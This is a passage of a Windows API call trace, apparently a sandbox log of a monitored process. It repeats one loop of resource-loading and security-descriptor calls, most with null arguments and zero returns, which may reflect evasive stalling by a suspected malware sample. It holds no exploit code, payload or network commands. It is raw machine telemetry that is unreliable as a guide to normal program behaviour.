pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.022] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.022] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.022] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.022] LockResource (hResData=0x0) returned 0x0 [0220.022] FreeResource (hResData=0x0) returned 0 [0220.022] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.022] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.022] LockResource (hResData=0x0) returned 0x0 [0220.022] FreeResource (hResData=0x0) returned 0 [0220.022] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.022] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.022] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.022] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.022] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.022] LockResource (hResData=0x0) returned 0x0 [0220.022] FreeResource (hResData=0x0) returned 0 [0220.022] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.022] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.022] LockResource (hResData=0x0) returned 0x0 [0220.022] FreeResource (hResData=0x0) returned 0 [0220.022] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.022] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.022] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.022] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.022] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.022] LockResource (hResData=0x0) returned 0x0 [0220.022] FreeResource (hResData=0x0) returned 0 [0220.022] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.022] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.022] LockResource (hResData=0x0) returned 0x0 [0220.023] FreeResource (hResData=0x0) returned 0 [0220.023] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.023] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.023] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.023] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.023] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.023] LockResource (hResData=0x0) returned 0x0 [0220.023] FreeResource (hResData=0x0) returned 0 [0220.023] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.023] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.023] LockResource (hResData=0x0) returned 0x0 [0220.023] FreeResource (hResData=0x0) returned 0 [0220.023] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.023] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.023] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.023] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.023] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.023] LockResource (hResData=0x0) returned 0x0 [0220.023] FreeResource (hResData=0x0) returned 0 [0220.023] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.023] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.023] LockResource (hResData=0x0) returned 0x0 [0220.023] FreeResource (hResData=0x0) returned 0 [0220.023] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.023] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.023] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.023] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.023] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.023] LockResource (hResData=0x0) returned 0x0 [0220.023] FreeResource (hResData=0x0) returned 0 [0220.023] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.023] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.023] LockResource (hResData=0x0) returned 0x0 [0220.023] FreeResource (hResData=0x0) returned 0 [0220.023] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.023] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.023] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.023] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.024] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.024] LockResource (hResData=0x0) returned 0x0 [0220.024] FreeResource (hResData=0x0) returned 0 [0220.024] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.024] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.024] LockResource (hResData=0x0) returned 0x0 [0220.024] FreeResource (hResData=0x0) returned 0 [0220.024] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.024] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.024] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.024] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.024] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.024] LockResource (hResData=0x0) returned 0x0 [0220.024] FreeResource (hResData=0x0) returned 0 [0220.024] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.024] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.024] LockResource (hResData=0x0) returned 0x0 [0220.024] FreeResource (hResData=0x0) returned 0 [0220.024] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.024] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.024] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.024] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.024] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.024] LockResource (hResData=0x0) returned 0x0 [0220.024] FreeResource (hResData=0x0) returned 0 [0220.024] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.024] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.024] LockResource (hResData=0x0) returned 0x0 [0220.024] FreeResource (hResData=0x0) returned 0 [0220.024] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.024] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.024] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.024] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.024] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.024] LockResource (hResData=0x0) returned 0x0 [0220.024] FreeResource (hResData=0x0) returned 0 [0220.024] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.025] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.025] LockResource (hResData=0x0) returned 0x0 [0220.025] FreeResource (hResData=0x0) returned 0 [0220.025] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.025] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.025] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.025] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.025] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.025] LockResource (hResData=0x0) returned 0x0 [0220.025] FreeResource (hResData=0x0) returned 0 [0220.025] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.025] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.025] LockResource (hResData=0x0) returned 0x0 [0220.025] FreeResource (hResData=0x0) returned 0 [0220.025] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.025] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.025] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.025] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.025] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.025] LockResource (hResData=0x0) returned 0x0 [0220.025] FreeResource (hResData=0x0) returned 0 [0220.025] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.025] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.025] LockResource (hResData=0x0) returned 0x0 [0220.025] FreeResource (hResData=0x0) returned 0 [0220.025] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.025] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.025] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.025] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.025] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.025] LockResource (hResData=0x0) returned 0x0 [0220.025] FreeResource (hResData=0x0) returned 0 [0220.025] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.025] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.025] LockResource (hResData=0x0) returned 0x0 [0220.025] FreeResource (hResData=0x0) returned 0 [0220.025] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.026] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.026] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.026] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.026] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.026] LockResource (hResData=0x0) returned 0x0 [0220.026] FreeResource (hResData=0x0) returned 0 [0220.026] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.026] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.026] LockResource (hResData=0x0) returned 0x0 [0220.026] FreeResource (hResData=0x0) returned 0 [0220.026] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.026] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.026] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.026] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.026] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.026] LockResource (hResData=0x0) returned 0x0 [0220.026] FreeResource (hResData=0x0) returned 0 [0220.026] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.026] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.026] LockResource (hResData=0x0) returned 0x0 [0220.026] FreeResource (hResData=0x0) returned 0 [0220.026] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.026] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.026] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.026] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.026] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.026] LockResource (hResData=0x0) returned 0x0 [0220.026] FreeResource (hResData=0x0) returned 0 [0220.026] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.026] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.026] LockResource (hResData=0x0) returned 0x0 [0220.026] FreeResource (hResData=0x0) returned 0 [0220.026] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.026] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.026] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.026] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.026] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.027] LockResource (hResData=0x0) returned 0x0 [0220.027] FreeResource (hResData=0x0) returned 0 [0220.027] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.027] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.027] LockResource (hResData=0x0) returned 0x0 [0220.027] FreeResource (hResData=0x0) returned 0 [0220.027] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.027] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.027] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.027] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.027] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.027] LockResource (hResData=0x0) returned 0x0 [0220.027] FreeResource (hResData=0x0) returned 0 [0220.027] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.027] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.027] LockResource (hResData=0x0) returned 0x0 [0220.027] FreeResource (hResData=0x0) returned 0 [0220.027] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.027] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.027] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.027] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.027] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.027] LockResource (hResData=0x0) returned 0x0 [0220.027] FreeResource (hResData=0x0) returned 0 [0220.027] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.027] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.027] LockResource (hResData=0x0) returned 0x0 [0220.027] FreeResource (hResData=0x0) returned 0 [0220.027] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.027] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.027] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.027] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.027] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.027] LockResource (hResData=0x0) returned 0x0 [0220.027] FreeResource (hResData=0x0) returned 0 [0220.027] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.027] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.027] LockResource (hResData=0x0) returned 0x0 [0220.028] FreeResource (hResData=0x0) returned 0 [0220.028] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.028] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.028] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.028] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.028] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.028] LockResource (hResData=0x0) returned 0x0 [0220.028] FreeResource (hResData=0x0) returned 0 [0220.028] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.028] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.028] LockResource (hResData=0x0) returned 0x0 [0220.028] FreeResource (hResData=0x0) returned 0 [0220.028] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.028] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.028] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.028] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.028] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.028] LockResource (hResData=0x0) returned 0x0 [0220.028] FreeResource (hResData=0x0) returned 0 [0220.028] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.028] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.028] LockResource (hResData=0x0) returned 0x0 [0220.028] FreeResource (hResData=0x0) returned 0 [0220.028] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.028] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.028] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.028] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.028] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.028] LockResource (hResData=0x0) returned 0x0 [0220.028] FreeResource (hResData=0x0) returned 0 [0220.028] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.028] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.028] LockResource (hResData=0x0) returned 0x0 [0220.028] FreeResource (hResData=0x0) returned 0 [0220.028] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.028] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.028] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.029] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.029] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.029] LockResource (hResData=0x0) returned 0x0 [0220.029] FreeResource (hResData=0x0) returned 0 [0220.029] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.029] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.029] LockResource (hResData=0x0) returned 0x0 [0220.029] FreeResource (hResData=0x0) returned 0 [0220.029] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.029] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.029] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.029] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.029] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.029] LockResource (hResData=0x0) returned 0x0 [0220.029] FreeResource (hResData=0x0) returned 0 [0220.029] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.029] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.029] LockResource (hResData=0x0) returned 0x0 [0220.029] FreeResource (hResData=0x0) returned 0 [0220.029] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.029] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.029] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.029] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.029] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.029] LockResource (hResData=0x0) returned 0x0 [0220.029] FreeResource (hResData=0x0) returned 0 [0220.029] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.029] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.029] LockResource (hResData=0x0) returned 0x0 [0220.029] FreeResource (hResData=0x0) returned 0 [0220.029] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.029] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.029] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 